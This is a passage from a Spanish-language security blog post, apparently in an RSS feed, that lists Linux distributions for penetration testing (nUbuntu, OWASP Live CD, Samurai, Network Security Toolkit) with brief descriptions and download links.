<p style="text-align: left;">Como su nombre lo indica basada en <strong>Ubuntu Linux</strong> y usa el escritorio <strong>Fluxbox.</strong> Su objetivo es tener una distribución Linux basada en Ubuntu, personalizada, agregando las herramientas necesarias para realizar pruebas de penetración en servidores y redes; eliminando también aplicaciones que no sean necesarias para este propósito.</p>
<p style="text-align: left;"><a rel="nofollow" target="_blank" title="nUbuntu Download" href="http://nubuntu.org/downloads.php">Descargar nUbuntu</a></p>
<p style="text-align: center;"><img class="alignnone" title="nUbuntu" src="http://img268.imageshack.us/img268/8845/2hhdbgz4449305.png" alt="2hhdbgz4449305 5 Distribuciones GNU/Linux para Pentesting" width="522" height="391" /></p>
<p style="text-align: center;">
<p style="text-align: left;"><strong>3. <a rel="nofollow" target="_blank" title="OWASP Live CD Project" href="http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project">OWASP Live CD</a></strong></p>
<p style="text-align: left;">Es una Live-CD que reune algunas de las mejores herramientas open source de seguridad en un sólo lugar. Contiene también documentación y ambientes interactivos de aprendizaje (como <a rel="nofollow" target="_blank" title="WebGoat, Plataforma de Pruebas de Seguridad Web - Instalación y ejecución en Windows" href="http://labs.dragonjar.org/labs-owasp-webgoat-plataforma-de-pruebas-de-seguridad-web-instalacion-en-windows"><strong>WebGoat</strong></a>) promoviendo así la educación en el campo de la <a title="Seguridad Web DragonJAR" href="http://www.dragonjar.org/category/seguridad-web"><strong>Seguridad Web</strong></a>. Para quienes no lo sabía <strong>OWASP</strong> (acrónimo de <em>Open Web Application Security Project</em>) es un proyecto de código abierto dedicado a determinar y combatir las causas que hacen que el software sea inseguro. <a title="OWASP DragonJAR" href="http://www.dragonjar.org/tag/owasp">En el blog encontrarás mucha información sobre este proyecto</a>.</p>
<p style="text-align: left;"><a rel="nofollow" target="_blank" title="OWASP Live CD Download" href="http://mtesauro.com/livecd/index.php?title=Main_Page#Downloads">Descargar OWASP Live CD</a></p>
<p style="text-align: center;"><img class="aligncenter" title="OWASP Live CD" src="http://img194.imageshack.us/img194/5285/socowaspmenu5164977.png" alt="socowaspmenu5164977 5 Distribuciones GNU/Linux para Pentesting" width="539" height="392" /></p>
<p style="text-align: center;">
<p style="text-align: left;"><strong>4. <a rel="nofollow" target="_blank" title="Samurai Web Testing Framework" href="http://samurai.inguardians.com/">Samurai Web Testing Framework</a></strong></p>
<p style="text-align: left;">Distribución Live preconfigurada para el pentesting de <strong>aplicaciones Web</strong>. Incluye muchas herramientas que permiten llevar a cabo fácilmente los 4 pasos básicos en un test de penetración web: <strong>Reconocimiento, Mapeo, Descubrimiento, Explotación.</strong> Además incluye una Wiki que permite almacenar la información recolectada durante el pentesting. <a title="    *           *      Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" href="http://www.dragonjar.org/samurai-entorno-de-trabajo-para-el-testing-de-seguridad-a-aplicativos-web.xhtml">En el blog encuentras más información sobre esta Live-CD</a>.</p>
<p style="text-align: left;"><a rel="nofollow" target="_blank" title="Samurai Web Testing Framework Download" href="http://sourceforge.net/project/showfiles.php?group_id=235785">Descargar Samurai Web Testing Framework</a></p>
<p style="text-align: center;"><img class="aligncenter" title="Samurai Web Testing Framework" src="http://img258.imageshack.us/img258/4732/booteoaf7.jpg" alt="booteoaf7 5 Distribuciones GNU/Linux para Pentesting" width="545" height="404" /></p>
<p style="text-align: left;"><strong>5. </strong><a rel="nofollow" target="_blank" title="NST" href="http://www.networksecuritytoolkit.org/nst/index.html"><strong>Network Security Toolkit</strong></a></p>
<p style="text-align: left;">Basada en Fedora, actualmente se encuentra en la versión 1.8.1. Su objetivo es proveer a los administradores de red un completo set de herramientas de seguridad open source. Contiene una gran parte de la lista de las <a rel="nofollow" target="_blank" title="Top 100 Security Tools" href="http://www.insecure.org/tools.html">100 mejores herramientas de seguridad</a> creada por <strong>Insecure</strong>. Lo fascinante es que permite convertir un PC cualquiera en un sistema diseñado para el análisis de tráfico de red, IDS, monitor de redes inalámbricas, entre otros usos. También util en muchos escenarios para la recuperación de daños.</p>
<p style="text-align: left;"><a rel="nofollow" target="_blank" title="Network Security Toolkit Download" href="http://sourceforge.net/project/showfiles.php?group_id=85467">Descargar NST</a></p>
<p style="text-align: center;"><img class="aligncenter" title="NST" src="http://img269.imageshack.us/img269/2928/nst6806785.jpg" alt="nst6806785 5 Distribuciones GNU/Linux para Pentesting" width="500" height="247" /></p>
<p style="text-align: center;">
<p style="text-align: left;">Hay muchas distribuciones Linux enfocadas a las auditorías de seguridad, no las menciono en el post debido a que muchas de ellas ya han sido abandonada por sus desarrolladores y no volvieron a lanzar ninguna actualización ni versiones nuevas. De cualquier manera, si interesa conocer algunas de ellas aquí tienes una lista:</p>
<ul>
<li>Pentoo</li>
<li>Knoppix STD</li>
<li>Notably Auditor</li>
<li>Phlak</li>
</ul>
<p>Por nombrar algunas&#8230; Y tu, <strong>¿Que otra distribución usas para este propósito?</strong></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/varias-distribuciones-live-cd-de-seguridad-en-un-dvd.xhtml" title="Varias Distribuciones Live CD de Seguridad en un DVD">Varias Distribuciones Live CD de Seguridad en un DVD</a></li><li><a href="http://www.dragonjar.org/x-25-conferencia-de-seguridad-informatica-en-mexico.xhtml" title="X.25 Conferencia de Seguridad Informática en Mexico">X.25 Conferencia de Seguridad Informática en Mexico</a></li><li><a href="http://www.dragonjar.org/memoria-usb-booteable-con-varias-distribuciones-de-seguridad-informatica.xhtml" title="Memoria USB Booteable con Varias Distribuciones de Seguridad Informática">Memoria USB Booteable con Varias Distribuciones de Seguridad Informática</a></li><li><a href="http://www.dragonjar.org/pentbox-una-suite-de-seguridad-y-pentesting-en-ruby.xhtml" title="PentBox &#8211; Una suite de seguridad y pentesting en ruby">PentBox &#8211; Una suite de seguridad y pentesting en ruby</a></li><li><a href="http://www.dragonjar.org/curso-en-el-sena-virtual-sobre-auditoria-en-seguridad.xhtml" title="Curso en el Sena Virtual sobre Auditoria en Seguridad">Curso en el Sena Virtual sobre Auditoria en Seguridad</a></li><li><a href="http://www.dragonjar.org/dradis-organiza-y-comparte-informacion-en-un-test-de-penetracion.xhtml" title="Dradis, organiza y comparte información en un Test de Penetración">Dradis, organiza y comparte información en un Test de Penetración</a></li><li><a href="http://www.dragonjar.org/como-archivo-etc-hosts.xhtml" title="Bloqueo de sitios Web usando el archivo HOSTS">Bloqueo de sitios Web usando el archivo HOSTS</a></li><li><a href="http://www.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas.xhtml" title="Laboratorios Hacking &#8211; Técnicas y contramedidas">Laboratorios Hacking &#8211; Técnicas y contramedidas</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/5-distribuciones-gnulinux-para-pentesting.xhtml/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
